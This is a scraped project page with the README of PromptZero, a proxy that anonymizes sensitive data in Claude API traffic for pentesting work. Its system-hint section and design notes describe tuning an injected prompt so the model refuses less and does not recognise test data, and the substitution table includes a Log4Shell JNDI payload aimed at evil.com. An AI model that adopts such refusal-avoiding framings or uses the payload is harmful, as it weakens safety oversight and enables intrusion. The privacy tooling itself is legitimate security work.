[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-80786":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":15,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":15,"stars7d":16,"stars30d":17,"stars90d":15,"forks30d":15,"starsTrendScore":13,"compositeScore":18,"rankGlobal":10,"rankLanguage":10,"license":10,"archived":19,"fork":19,"defaultBranch":20,"hasWiki":21,"hasPages":19,"topics":22,"createdAt":10,"pushedAt":10,"updatedAt":35,"readmeContent":36,"aiSummary":37,"trendingCount":15,"starSnapshotCount":15,"syncStatus":38,"lastSyncTime":39,"discoverSource":40},80786,"promptzero","openbashok\u002Fpromptzero","openbashok","Zero trace. Full answer. — Transparent Claude API proxy that anonymizes PII and sensitive data before it leaves your environment. From pentesters, to pentesters.","https:\u002F\u002Fopenbash.com",null,"Python",56,3,39,0,14,17,47.51,false,"main",true,[23,24,25,26,27,28,29,30,31,32,33,34],"anonymization","claude","data-privacy","infosec","llm","openai","pentesting","pii","privacy","proxy","redteam","security","2026-06-11 04:07:14","```\n██████╗ ██████╗  ██████╗ ███╗   ███╗██████╗ ████████╗    ███████╗███████╗██████╗  ██████╗\n██╔══██╗██╔══██╗██╔═══██╗████╗ ████║██╔══██╗╚══██╔══╝    ╚══███╔╝██╔════╝██╔══██╗██╔═══██╗\n██████╔╝██████╔╝██║   ██║██╔████╔██║██████╔╝   ██║          ███╔╝ █████╗  ██████╔╝██║   ██║\n██╔═══╝ ██╔══██╗██║   ██║██║╚██╔╝██║██╔═══╝    ██║         ███╔╝  ██╔══╝  ██╔══██╗██║   ██║\n██║     ██║  ██║╚██████╔╝██║ ╚═╝ ██║██║        ██║        ███████╗███████╗██║  ██║╚██████╔╝\n╚═╝     ╚═╝  ╚═╝ ╚═════╝ ╚═╝     ╚═╝╚═╝        ╚═╝        ╚══════╝╚══════╝╚═╝  ╚═╝ ╚═════╝\n```\n\n\u003Cdiv align=\"center\">\n\n**Zero Trust architecture for LLM prompts.**\n*Zero trace. 
Full answer.*\n\n[![Version](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fversion-2.5.0-blue.svg)](https:\u002F\u002Fgithub.com\u002Fopenbashok\u002Fpromptzero)\n[![Python](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fpython-3.10%2B-blue.svg)](https:\u002F\u002Fpython.org)\n[![License](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Flicense-MIT-green.svg)](LICENSE)\n[![OpenBash](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fby-OpenBash.com-red.svg)](https:\u002F\u002Fopenbash.com)\n[![From pentesters](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Ffrom%20pentesters-to%20pentesters-orange.svg)](https:\u002F\u002Fopenbash.com)\n\n\u003C\u002Fdiv>\n\n---\n\n> **PromptZero** applies Zero Trust principles to LLM interactions. A local, transparent\n> proxy that detects and replaces sensitive data — identities, infrastructure, secrets,\n> client material — in your prompts **before** they leave your environment, and restores\n> the real values in the response. Never trust the API. Always verify what crosses the\n> boundary. Your data stays home.\n\n---\n\n## The Problem\n\nYou use AI to analyze logs, write pentest reports, review code, summarize contracts.\nEvery prompt you send contains real IPs, hostnames, names, credentials, client\nidentifiers, payloads — and every byte of that crosses a boundary you do not control:\n\n```\nYou type:                          Claude receives:\n─────────────────────────────      ─────────────────────────────\n\"Analyze traffic from              \"Analyze traffic from\n 192.168.1.45 targeting             192.168.1.45 targeting\n db.prod.company.com                db.prod.company.com     ← your real infra\n Credentials: admin:P@ss1\"          Credentials: admin:P@ss1\"  ← your real creds\n```\n\nVendor contracts and Private-AI SaaS don't fix this — they just shift trust to\na different third party. 
PromptZero handles the boundary locally and lets you\nverify it end-to-end with the tools you already use (Burp, mitmproxy).\n\n---\n\n## How It Works\n\n```\n╔══════════════════════════════════════════════════════════════════════╗\n║                        YOUR ENVIRONMENT  (trusted)                   ║\n║                                                                      ║\n║  ┌─────────────┐     ┌──────────────────────────────┐               ║\n║  │  Your App   │────▶│         PromptZero            │               ║\n║  │  Claude CLI │     │       localhost:8000           │               ║\n║  │  SDK \u002F curl │◀────│                               │               ║\n║  └─────────────┘     │  ① Detect  sensitive spans   │               ║\n║                       │  ② Replace synthetic values  │               ║\n║                       │  ③ Forward clean prompt      │               ║\n║                       │  ④ Receive model response    │               ║\n║                       │  ⑤ Restore real values       │               ║\n║                       └──────────────┬───────────────┘               ║\n║                                      │                               ║\n║         ✗ Sensitive data NEVER       │  Only synthetic data          ║\n║           crosses this line          │  crosses this boundary        ║\n╚══════════════════════════════════════│══════════════════════════════╝\n                                       │   ← TRUST BOUNDARY\n                              ┌────────▼────────┐\n                              │   api.anthropic │     (untrusted —\n                              │      .com       │      verifiable\n                              │                 │      with Burp \u002F\n                              └─────────────────┘      mitmproxy)\n```\n\n### Before & After\n\n```\nYOUR PROMPT (real data)              WHAT CLAUDE SEES (synthetic)\n══════════════════════════           ════════════════════════════════\n192.168.1.45         
     ────▶      198.51.100.1          (RFC 5737)\n2001:db8:1234::5          ────▶      2001:db8::1           (RFC 3849)\ndb.prod.company.com       ────▶      alpha.example.com     (RFC 2606)\nadmin@company.com         ────▶      user001@example.com   (RFC 2606)\nJohn Smith                ────▶      Soren Brännström      (NLP)\nAcme Financial S.A.       ────▶      Nordhaven Holdings    (NLP)\n+54 11 4444-5555          ────▶      +1-555-000-0001\nDNI 28.456.123            ────▶      FAKE-ID-000001\npassword='S3cur3P@ss!'    ────▶      password='sk-faux-0001-xxxxxxxxxxxxxxxx'\nsk-ant-api03-xxxxx...     ────▶      FAKE_TOKEN_0001_xxxxxxxx\n${jndi:ldap:\u002F\u002Fevil.com\u002Fx} ────▶      ${jndi:ldap:\u002F\u002Fbravo.example.com\u002Fx}\n\n\nCLAUDE'S RESPONSE (synthetic)        YOU RECEIVE (real data restored)\n════════════════════════════         ═════════════════════════════════\n\"198.51.100.1 shows signs ────▶      \"192.168.1.45 shows signs\n of lateral movement to               of lateral movement to\n alpha.example.com\"                   db.prod.company.com\"\n```\n\n> All synthetic values come from **IANA-reserved documentation ranges** —\n> RFC 5737 (`198.51.100.0\u002F24`, `203.0.113.0\u002F24`), RFC 3849\n> (`2001:db8::\u002F32`) and RFC 2606 (`example.com`). 
The model treats them\n> as opaque non-existent targets, without the \"loopback \u002F internal-lab\"\n> semantics that earlier loopback-flavoured fakes (`127.0.0.x`,\n> `*.localhost`) carried — see [Design notes](#design-notes-why-example-com--system-hint) below.\n\n---\n\n## What Gets Protected\n\n| Data Type | Real → Synthetic | Detection |\n|---|---|---|\n| IPv4 address | `45.77.12.91` → `198.51.100.1` (RFC 5737) | Regex |\n| IPv6 address | `2001:abcd::1` → `2001:db8::1` (RFC 3849) | Regex |\n| Hostname \u002F FQDN | `vpn.corp.com` → `alpha.example.com` (RFC 2606) | Regex + NLP (URL) |\n| URL | `https:\u002F\u002Fapi.corp.com\u002Fv2` → `https:\u002F\u002Fbravo.example.com\u002Fv2` | Regex + NLP |\n| host:port | `db.internal:5432` → `charlie.example.com:5432` | Regex |\n| Email | `john@corp.com` → `user001@example.com` (RFC 2606) | Regex + NLP |\n| Credential value | `password='S3cur3P@ss!'`, `Authorization: Bearer …`, `\"secret\":\"…\"` → `sk-faux-0001-xxxxxxxxxxxxxxxx` | **Regex (key-aware)** |\n| Phone (US\u002FCA) | `+1-555-123-4567` → `+1-555-000-0001` | Regex + NLP |\n| Phone (LatAm + ES) | `+54 11 4444-5555`, `+56 9 1234 5678`, `+34 612 345 678`, `+52 55 1234 5678`, `+57 300 123 4567`, `+598 99 123 456` → `+1-555-000-0001` | **Regex (LatAm\u002FES)** |\n| Person name | `John Smith`, `María Fernández` | **NLP (spaCy en+es)** |\n| Organization | `Acme Corp S.A.`, `Nexabank Financial S.A.` | **NLP (spaCy en+es)** |\n| Argentina DNI | `DNI 28.456.123` → `DNI 11.111.001` | **Regex (AR)** |\n| Argentina CUIT\u002FCUIL | `20-12345678-9` → `20-11111001-1` | **Regex (AR)** |\n| Chile RUT | `12.345.678-K` → `11.111.001-1` | **Regex (CL)** |\n| Spain DNI\u002FNIE | `12345678A`, `X1234567A` → `X0000001A` | **Regex (ES) + NLP** |\n| Uruguay CI | `1.234.567-8` → `1.111.001-1` | **Regex (UY)** |\n| Colombia CC | `CC 1.234.567` → `CC 1.111.001` | **Regex (CO)** |\n| Mexico CURP | `AAAA000000HAAAAA00` → `FAKE000001HDFXXX11` | **Regex (MX)** |\n| Mexico RFC | 
`AAAA000000AAA` → `FAKE000001XX1` | **Regex (MX)** |\n| Passport | `AAB123456` → `XX0000001` | **NLP (Presidio)** |\n| SSN | `123-45-6789` → `000-00-0001` | Regex + NLP |\n| Credit card | `4111 1111 1111 1234` → `4111-1111-1111-0001` | Regex + NLP |\n| IBAN | `GB29NWBK60161331926819`, `AR1500011110000…` → `FAKEIBAN000…` | NLP |\n| API key \u002F Token | `sk-ant-api03-xxxxxx...` → `FAKE_TOKEN_0001_xxxxxxxx` | Regex |\n\n> **Pentesting-friendly substitutions:** all fakes live inside\n> IANA-reserved documentation ranges (RFC 5737 for IPv4, RFC 3849 for\n> IPv6, RFC 2606 for `example.com`). The model treats them as opaque\n> non-existent targets, **without** the \"loopback \u002F internal lab\"\n> semantics that earlier `127.0.0.x` \u002F `*.localhost` fakes carried —\n> which used to silently downgrade the severity of external-exposure\n> findings. See [Design notes](#design-notes-why-example-com--system-hint).\n\n---\n\n## Architecture\n\n```\npromptzero\u002F\n├── main.py          ← FastAPI proxy server (drop-in for api.anthropic.com)\n├── sanitizer.py     ← Detection engine: NLP (Presidio+spaCy) + Regex layers\n├── setup.sh         ← One-command setup\n├── requirements.txt\n├── .env.example\n└── examples\u002F\n    ├── poc\u002F                ← Proof-of-concept: 5 fictitious datasets + demo scripts (local + Claude E2E)\n    ├── document_summary\u002F   ← Summarize PDF\u002FDOCX\u002FTXT with PII protection\n    └── pentest_report\u002F     ← Generate full pentest reports from findings JSON\n```\n\n### Detection layers\n\n```\nText input\n    │\n    ├─▶ [ NLP Layer — Presidio + spaCy (en + es) ]\n    │     PERSON, ORGANIZATION, PHONE, EMAIL,\n    │     CREDIT_CARD, IBAN, SSN, PASSPORT,\n    │     NATIONAL_ID (ES_NIF, NRP), URL, IP_ADDRESS\n    │\n    ├─▶ [ Regex Layer — country-specific national IDs ]\n    │     AR: DNI, CUIT\u002FCUIL          CL: RUT\n    │     ES: DNI\u002FNIE                 UY: CI\n    │     CO: Cédula (CC)             MX: CURP, RFC\n    │    
 Phones: +34 +52 +54 +55 +56 +57 +598\n    │\n    ├─▶ [ Regex Layer — network & infra ]\n    │     IPv4, IPv6, hostnames, host:port,\n    │     long tokens\u002FAPI keys, URLs\n    │\n    └─▶ [ Merge & deduplicate by span ]\n          └─▶ Replace real → synthetic\n                └─▶ Store in session mapping table\n```\n\n### Session mapping\n\nEach conversation gets a **session-scoped bidirectional mapping table**.\nThe same real value always maps to the same synthetic value within a session —\nso your conversation stays coherent end-to-end.\n\n```\nSession: \"pentest-acmecorp-2026\"\n──────────────────────────────────────────────────\nReal value                   Synthetic value\n──────────────────────────────────────────────────\n192.168.1.45        ←──────▶  198.51.100.1\ndb.prod.acme.com    ←──────▶  alpha.example.com\nJohn Smith          ←──────▶  Soren Brännström\nadmin@acme.com      ←──────▶  user001@example.com\nS3cur3P@ss!         ←──────▶  sk-faux-0001-xxxxxxxxxxxxxxxx\n──────────────────────────────────────────────────\n           Stored locally. Never sent anywhere.\n```\n\n---\n\n## Quick Start\n\nTwo ways to run the proxy. Same behaviour either way — pick whichever\nfits your environment.\n\n### Option A — Docker (recommended)\n\nNo Python, no virtualenv, no model download dance. Models are baked\ninto the published image (linux\u002Famd64 + linux\u002Farm64). Pull and run:\n\n```bash\ndocker run -p 8000:8000 \\\n    -e ANTHROPIC_API_KEY=sk-ant-... 
\\\n    ghcr.io\u002Fopenbashok\u002Fpromptzero:latest\n# Listening on http:\u002F\u002Flocalhost:8000\n```\n\nCommon variants:\n\n```bash\n# Pass a full .env file (ANTHROPIC_API_KEY + UPSTREAM_PROXY + …)\ndocker run -p 8000:8000 --env-file .env ghcr.io\u002Fopenbashok\u002Fpromptzero\n\n# Route the upstream hop through Burp running on the host (macOS \u002F Windows)\ndocker run -p 8000:8000 --env-file .env \\\n    -e UPSTREAM_PROXY=http:\u002F\u002Fhost.docker.internal:8080 \\\n    -e UPSTREAM_VERIFY=false \\\n    ghcr.io\u002Fopenbashok\u002Fpromptzero\n```\n\nBuild it yourself if you prefer:\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fopenbashok\u002Fpromptzero && cd promptzero\ndocker build -t promptzero .                       # 'lg' models, ~1.5 GB\ndocker build --build-arg SPACY_SIZE=sm -t promptzero:slim .   # ~300 MB\n```\n\n### Option B — Native install\n\nUseful if you want to hack on the proxy itself or you prefer to keep\nthe venv on your host.\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fopenbashok\u002Fpromptzero\ncd promptzero\n\n.\u002Fsetup.sh                 # venv + deps + spaCy models en + es (~1 GB)\ncp .env.example .env       # add your ANTHROPIC_API_KEY\npython main.py             # listening on http:\u002F\u002Flocalhost:8000\n```\n\n`.\u002Fsetup.sh` downloads the `lg` spaCy models by default. Use\n`.\u002Fsetup.sh medium` (~40 MB) or `.\u002Fsetup.sh small` (~12 MB) for a\nlighter install, or `.\u002Fsetup.sh en-only` if you only process English.\n\n---\n\n## Usage\n\nPromptZero is a **drop-in replacement** for `https:\u002F\u002Fapi.anthropic.com`.\nOne line change. 
Everything else stays the same.\n\n### Python SDK\n\n```python\nimport anthropic\n\nclient = anthropic.Anthropic(\n    api_key=\"your-api-key\",\n    base_url=\"http:\u002F\u002Flocalhost:8000\",   # ← only change\n)\n\nmessage = client.messages.create(\n    model=\"claude-opus-4-6\",\n    max_tokens=1024,\n    messages=[{\n        \"role\": \"user\",\n        \"content\": \"Analyze traffic from 10.0.1.42 to db.prod.corp:5432. User: john@corp.com\"\n    }],\n    extra_headers={\"x-session-id\": \"my-session\"},  # keeps mapping consistent\n)\n\nprint(message.content[0].text)\n# → Real IPs and email are restored in the response\n```\n\n### curl\n\n```bash\ncurl http:\u002F\u002Flocalhost:8000\u002Fv1\u002Fmessages \\\n  -H \"x-api-key: $ANTHROPIC_API_KEY\" \\\n  -H \"x-session-id: my-session\" \\\n  -H \"anthropic-version: 2023-06-01\" \\\n  -H \"content-type: application\u002Fjson\" \\\n  -d '{\n    \"model\": \"claude-opus-4-6\",\n    \"max_tokens\": 1024,\n    \"messages\": [{\n      \"role\": \"user\",\n      \"content\": \"The payload hit 203.0.113.5:8443 — what does this CVE-2024-21762 exploit look like?\"\n    }]\n  }'\n```\n\n### Management endpoints\n\n```bash\n# Health check (also surfaces the active upstream \u002F hint config)\nGET    \u002Fhealth\n\n# Cumulative counters since startup (requests, bytes, sensitive spans by kind)\nGET    \u002Fstats\n\n# Inspect what PromptZero mapped in a session (debug)\nGET    \u002Fsessions\u002F{session_id}\u002Fmappings\n\n# Inspect the *sanitized request* and *desanitized response* recorded\n# for each call in a session — proof that no real PII reached upstream.\n# Requires DEBUG_AUDIT=1 at start time.\nGET    \u002Fsessions\u002F{session_id}\u002Faudit\n\n# Reset a session's mapping table (and audit log if any)\nDELETE \u002Fsessions\u002F{session_id}\n```\n\nThe proxy terminal prints **one colored trace line per request**, showing\nexactly what got sanitized — useful when running Claude Code (or any\nclient) 
alongside it so you can verify in real time which sensitive data was masked\non each turn:\n\n```\n[trace] POST \u002Fv1\u002Fmessages     session=poc-pent  +4 spans (total 4: 1 phone, 1 email, 1 ipv4, 1 url)  in= 197B out= 494B  200 2012ms\n[trace] POST \u002Fv1\u002Fmessages     session=poc-pent  +3 spans (total 7: 2 ipv4, 1 person, 1 hostname)  in= 185B out= 697B  200 1273ms\n[trace] GET   \u002Fv1\u002Fmodels           (passthrough, no sanitization)  200  367ms\n```\n\nFor cumulative metrics, hit `\u002Fstats`:\n\n```bash\nwatch -n 1 'curl -s localhost:8000\u002Fstats | jq'\n```\n\nExample payload:\n\n```json\n{\n  \"uptime_seconds\": 142.3,\n  \"active_sessions\": 2,\n  \"requests\": {\n    \"total\": 7,\n    \"messages\": 5,\n    \"count_tokens\": 1,\n    \"passthrough\": 1,\n    \"errors\": 0\n  },\n  \"bytes\": {\n    \"sanitized_in\":   12480,\n    \"desanitized_out\": 28350\n  },\n  \"pii_spans\": {\n    \"total_unique\": 47,\n    \"by_kind\": {\n      \"person\": 8, \"org\": 5, \"ipv4\": 14, \"hostname\": 9,\n      \"email\": 6, \"national_id_ar_dni\": 3, \"phone\": 2\n    }\n  }\n}\n```\n\n### Routing the Claude Code CLI through PromptZero\n\nThe proxy is a drop-in replacement for `api.anthropic.com`, so the Claude Code\nCLI works through it with a single env var:\n\n```bash\n# Start PromptZero (terminal 1)\npython main.py\n\n# Run Claude Code via the proxy (terminal 2)\nexport ANTHROPIC_BASE_URL=http:\u002F\u002Flocalhost:8000\nclaude\n\n# Every prompt typed in the CLI is now sanitized before reaching Claude,\n# and Claude's responses are desanitized before reaching your terminal.\n```\n\nWhat the proxy handles for the CLI:\n\n| Route | Behaviour |\n|---|---|\n| `POST \u002Fv1\u002Fmessages`             | Sanitized → forwarded. Response desanitized. Streaming OK. |\n| `POST \u002Fv1\u002Fmessages\u002Fcount_tokens`| Sanitized so token counts reflect the sanitized prompt.    
|\n| Anything else under `\u002Fv1\u002F*`     | Forwarded unchanged (`models`, `organizations`, `files`, `batches`, …) |\n\nVerify Claude Code is going through the proxy:\n\n```bash\n# In a third terminal — watch active sessions grow as you use the CLI\nwatch -n 1 'curl -s http:\u002F\u002Flocalhost:8000\u002Fhealth'\n\n# Inspect what got mapped in the last session\ncurl -s http:\u002F\u002Flocalhost:8000\u002Fsessions\u002F\u003Cid>\u002Fmappings | jq\n```\n\n### Inspecting upstream traffic with Burp Suite (or mitmproxy)\n\nDon't take our word for it — route PromptZero's upstream connection\n(PromptZero → `api.anthropic.com`) through Burp and inspect every byte\nyourself. Two env vars in `.env`:\n\n```bash\n# Send PromptZero → api.anthropic.com traffic through Burp\nUPSTREAM_PROXY=http:\u002F\u002F127.0.0.1:8080\n\n# Burp does TLS interception with its own CA — either trust it\n# explicitly (recommended):\nUPSTREAM_CA_BUNDLE=\u002FUsers\u002Fyou\u002Fburp-ca.pem\n# …or skip verification for a quick demo (insecure):\nUPSTREAM_VERIFY=false\n```\n\nSteps:\n\n1. **Export Burp's CA cert as PEM**\n   `Burp → Proxy → Settings → Import \u002F export CA certificate → \"Certificate in PEM format\"`\n   Save it as `~\u002Fburp-ca.pem`.\n\n2. **Enable Burp's proxy listener** on `127.0.0.1:8080` (default).\n\n3. **Set the env vars in `.env`** (snippet above) and restart `python main.py`.\n\n4. **Confirm via \u002Fhealth** that the proxy picked up the config:\n   ```bash\n   curl -s http:\u002F\u002Flocalhost:8000\u002Fhealth | jq\n   # → \"upstream_proxy\": \"http:\u002F\u002F127.0.0.1:8080\"\n   #   \"upstream_verify\": \"\u002FUsers\u002Fyou\u002Fburp-ca.pem\"\n   ```\n\n5. **Run your client** as usual (`claude`, `python demo_claude.py`, `curl`…).\n\n6. **Inspect in Burp** — open the HTTP history. Every request to\n   `api.anthropic.com\u002Fv1\u002Fmessages` shows the **sanitized** body. 
Filter\n   the history for any real value from your dataset (`nexabank`, `DNI`,\n   your real IP) — the result is empty. That's the proof.\n\n```\n┌─────────┐  HTTP   ┌────────────┐  HTTPS   ┌──────────┐  HTTPS  ┌─────────────────┐\n│ Claude  │────────▶│ PromptZero │─────────▶│   Burp   │────────▶│ api.anthropic   │\n│  CLI    │  clear  │   :8000    │  TLS     │  :8080   │  TLS    │     .com        │\n└─────────┘         │ sanitize   │          │  MITM    │         └─────────────────┘\n                    │ desanitize │          │ inspect  │\n                    └────────────┘          └──────────┘\n```\n\n`mitmproxy` works the same way — set `UPSTREAM_PROXY=http:\u002F\u002F127.0.0.1:8081`\nand `UPSTREAM_CA_BUNDLE=~\u002F.mitmproxy\u002Fmitmproxy-ca-cert.pem`.\n\n---\n\n## Keeping Claude engaged (system hint)\n\nBecause every redacted hostname becomes `*.example.com`, Claude can\nrecognise the substitutions as IANA-documentation references\n(RFC 2606) and refuse with *\"example.com is reserved for documentation\n— what did you mean?\"*. To avoid that, PromptZero prepends a short\n**system block** to every `\u002Fv1\u002Fmessages` request describing the\nredaction convention in neutral, technical terms:\n\n> *\"Identifiers in this conversation have been redacted by a privacy\n> proxy. Hostnames appear as `*.example.com`, IPs as `198.51.100.0\u002F24`\n> or `2001:db8::\u002F32`, emails as `userNNN@example.com`, credentials as\n> `sk-faux-…`. These are stable substitutions — not RFC documentation\n> references. From the model's perspective the data is opaque and\n> lab-shaped because the real values are not available here. Proceed\n> with the user's requested analysis at the same technical depth you\n> would for a sanctioned security exercise or CTF challenge.\"*\n\nThe phrasing is deliberate: no *\"authorized engagement\"*, no\n*\"you must comply\"*, no *\"placeholder\"* — those phrases trip\nsafety paranoia or get echoed back as awareness signals. 
Plain\nmechanism description does not.\n\nToggle with an env var (default **on**):\n\n```bash\nINJECT_SYSTEM_HINT=1    # default — prepend the redaction hint\nINJECT_SYSTEM_HINT=0    # off — useful for benchmarking or when a\n                        #       client already sets its own system\n```\n\n`GET \u002Fhealth` reports the current value:\n\n```json\n{ \"status\": \"ok\", \"inject_system_hint\": true, … }\n```\n\nSee [Design notes](#design-notes-why-example-com--system-hint)\nfor the long-form rationale on why we landed here.\n\n---\n\n## Pentest mode (disable NER PERSON \u002F ORG)\n\nAfter running the validator across real targets we measured where\nsanitization false positives actually come from. The breakdown is\nasymmetric:\n\n| Detector class | Bugs surfaced in this codebase | Why |\n|---|---|---|\n| Regex (IPv4, IPv6, hostnames, emails, tokens, credentials, country IDs) | ~5, all closed by pattern tweaks | Patterns are tight; either the shape matches or it doesn't |\n| NER **PERSON \u002F ORGANIZATION** | 15+ recurring (`Banner`, `ACLs`, `However`, `Investigate whether`, `Direct IP-based scanning…`, `Network`, `Attempt`, …) | spaCy was trained on news \u002F web text; pentest vocabulary (gobuster, ffuf, ACLs, Reconnaissance, …) wasn't in the corpus, so every capitalised English word at a bullet start risks misfiring |\n\nFor pentest workflows the input is mostly tool output (`nmap`,\n`gobuster`, `sqlmap`, Burp HTTP history) and code — content where\nPERSON \u002F ORG detection contributes ~0 actual privacy value and 100% of\nthe false-positive noise. 
The proxy ships a switch to drop those two\nentity classes entirely:\n\n```bash\nDETECT_PERSON_ORG=1    # default — full NER pipeline\nDETECT_PERSON_ORG=0    # pentest mode — drop PERSON \u002F ORG, keep everything else\n```\n\nWhat stays intact when off: IPv4, IPv6, hostnames, URLs, host:port,\nemails, country-specific national IDs (AR\u002FCL\u002FES\u002FUY\u002FCO\u002FMX), credit\ncards, IBAN, SSN, phones, API tokens, key-aware credentials. What\ngoes away: detection of standalone person \u002F organization names in\nfree-form narrative.\n\n`GET \u002Fhealth` reports the current value:\n\n```json\n{ \"status\": \"ok\", \"detect_person_org\": false, … }\n```\n\nWhen to use which mode:\n\n- **`DETECT_PERSON_ORG=1`** (default) — incident reports, document\n  summaries, customer-support transcripts, anything written by\n  humans where you want auditor \u002F contact \u002F client names redacted.\n- **`DETECT_PERSON_ORG=0`** — driving Claude Code through the proxy\n  for active pentest engagements, log triage, code review on shell\n  output, automated tooling that produces structured technical text.\n\n---\n\n## Integration test suite\n\n`examples\u002Fpoc\u002Fintegration_test.py` drives real Claude calls through the\nproxy and asserts four invariants per scenario — useful as a regression\nrunner after any sanitizer change, and as a sanity probe before going\ninto a real engagement:\n\n| Check | What it asserts |\n|---|---|\n| **L** leak       | No expected real value appears in the upstream payload Anthropic received |\n| **N** ner-recall | Every expected real value is present in the session mapping table |\n| **R** round-trip | No fake value remains in the desanitized reply (every substitution was reversed) |\n| **A** awareness  | The model does not call out the data as test \u002F placeholder \u002F fictional |\n\nSix scenarios out of the box (single-turn pentest report, log triage,\ntransformation resistance, JSON payload, code review, plus a 
3-turn\nconversation history scenario for re-sanitization across turns):\n\n```bash\n# Start the proxy with DEBUG_AUDIT=1 so the runner can read \u002Faudit\nDEBUG_AUDIT=1 python main.py\n\n# In a second terminal\npython examples\u002Fpoc\u002Fintegration_test.py \\\n    --proxy http:\u002F\u002F127.0.0.1:8000 \\\n    --model claude-haiku-4-5\n```\n\nOutput is per-scenario PASS\u002FFAIL plus a punch-list of any check that\nfailed — the suite caught four real bugs during its initial build\n(Presidio URL truncation, short password leak, IPv6 fake-pool\ncollision, hostname false-positives on Python identifiers) before any\nof them shipped.\n\n---\n\n## Examples\n\n### Proof of Concept\n\nThe fastest way to *see* PromptZero in action — five fictitious datasets (personal\ndata, full pentest engagement with HTTP req\u002Fres + payloads, injection catalog,\nincident response, support chat) and three demo scripts (local sanitizer,\nvisual HTML report, end-to-end against Claude).\n\n```bash\ncd examples\u002Fpoc\n\n# Standalone — no API call, prints original \u002F sanitized \u002F desanitized\n# + the full real↔fake mapping table.\npython demo_local.py\npython demo_local.py data\u002F01_personal_records.json\n\n# Visual HTML report — side-by-side original vs sanitized with each\n# sensitive span colour-coded, hover-to-link mappings, summary table.\npython demo_html.py --open\npython demo_html.py --with-claude --task triage \\\n    --dataset data\u002F04_incident_response.json --out ir.html --open\n\n# End-to-end against the real Claude API (proxy must be running)\npython demo_claude.py\npython demo_claude.py --dataset data\u002F04_incident_response.json --task triage\n```\n\nSee [`examples\u002Fpoc\u002FREADME.md`](examples\u002Fpoc\u002FREADME.md) for the full dataset\ncatalog and script options.\n\n### Document Summary\n\nSummarize any document (PDF, DOCX, TXT, log) with full PII protection.\n\n```bash\ncd examples\u002Fdocument_summary\npip install -r 
requirements.txt\n\npython summarize.py contract.pdf\npython summarize.py incident_report.docx --mode executive --lang es\npython summarize.py access.log --mode technical\n```\n\n### Pentest Report Generator\n\nGenerate professional pentest reports from a structured findings JSON.\nIPs, hostnames, client names, credentials, and payloads are all protected.\n\n```bash\ncd examples\u002Fpentest_report\npip install -r requirements.txt\n\n# Full technical report\npython report.py findings.json\n\n# Executive summary in Spanish\npython report.py findings.json --mode executive --lang es --out ejecutivo.md\n\n# Remediation checklist\npython report.py findings.json --mode remediation --out fixes.md\n\n# Protect short passwords the proxy might miss\npython report.py findings.json --protect \"P@ssw0rd1\" \"Summer2023!\"\n```\n\nSee [`examples\u002Fpentest_report\u002Fsample_findings.json`](examples\u002Fpentest_report\u002Fsample_findings.json)\nfor a complete example with 6 realistic findings (critical → low).\n\n---\n\n## Design notes — Why `example.com` + system hint?\n\nThis is the rationale behind the substitution choices, in case you\nwant to fork or tune the proxy for a different LLM family or risk\nposture. We iterated through three different fake-domain strategies\nand each had a different failure mode.\n\n**1. Loopback-flavoured fakes (early versions: `127.0.0.x` \u002F\n`*.localhost` \u002F `userNNN@fakecorp.local`).** Worked for round-trip\nbut silently changed Claude's reasoning: external-exposure findings\ngot framed as \"internal lab \u002F loopback service, lower criticality\".\nFor pentest reports this means the model **downgrades severity**\nwithout telling you. Dropped.\n\n**2. Plausible real-looking domains (e.g. 
`acme-corp.io`,\n`nexabank.com`).** Two failure modes:\n- The model recognises the brand from its training corpus and\n  applies real-world knowledge (\"Nexabank uses Spring Boot, so…\")\n  contaminating the analysis with hallucinated facts about a real\n  company.\n- Names like *Acme Corp*, *Globex*, *Initech*, *Umbrella Tech* are\n  exactly Claude's go-to placeholders when **inventing** fictional\n  examples in its own writing. The model emits them unsolicited;\n  the desanitizer then maps them back to whatever happened to live\n  in the session table (often an NLP false-positive like\n  `Credential → Bob Calloway`) and corrupts the user-visible\n  output.\n\n**3. IANA-reserved documentation ranges (current).** RFC 5737\n(`198.51.100.0\u002F24`, `203.0.113.0\u002F24`), RFC 3849\n(`2001:db8::\u002F32`), RFC 2606 (`example.com`). Claude has these in\nits training corpus **as placeholders**, so it doesn't pull\nreal-world facts about them and doesn't apply loopback or\ninternal-only semantics. The name pools (`Soren Brännström`,\n`Nordhaven Holdings`, …) are deliberately uncommon European-flavoured\ninventions that Claude does **not** emit spontaneously when writing\nnarrative examples.\n\nThe trade-off: with `*.example.com` the model occasionally\nrecognises the substitution and asks *\"example.com is reserved for\ndocumentation — what did you mean?\"*. That's where the\n**[system hint](#keeping-claude-engaged-system-hint)** comes in: a\nshort, neutral text block prepended to every request that explains\nthe redaction mechanism and instructs the model to operate at the\ndepth of a sanctioned security exercise. It defuses the recognition\nwithout sounding like a jailbreak — we tried framings with\n*\"authorized engagement\"*, *\"you must comply\"*, and *\"real\npentest\"*, all of which increased refusal rates because they hit\nsafety patterns directly. 
Naming the mechanism does not.\n\nIf your use case is **not** pentesting — say, generating training\ncontent where the lab framing actually helps — disable the hint\nwith `INJECT_SYSTEM_HINT=0`. The substitution itself remains\nidentical.\n\n---\n\n## About OpenBash\n\n**PromptZero** is a project by [OpenBash.com](https:\u002F\u002Fopenbash.com) —\na community built **from pentesters, to pentesters**.\n\nWe build open-source security tools that help the community work smarter,\nstay protected, and keep sensitive data where it belongs: at home.\n\nIf this tool helps you, share it. If you find a bug, open an issue.\nIf you improve it, send a PR.\n\n---\n\n## Contributing\n\n```bash\n# Fork → clone → branch\ngit checkout -b feature\u002Fmy-improvement\n\n# Make changes, test manually\npython main.py &\n# test your changes against localhost:8000\n\n# Submit PR to main\n```\n\nIdeas for contributions:\n- Additional language support (spaCy models for ES, PT, FR, DE)\n- Persistent session storage (SQLite \u002F Redis)\n- More examples (`log_analyzer`, `code_reviewer`, `nessus_parser`)\n- CLI wrapper (`promptzero \"your prompt here\"`)\n- Docker 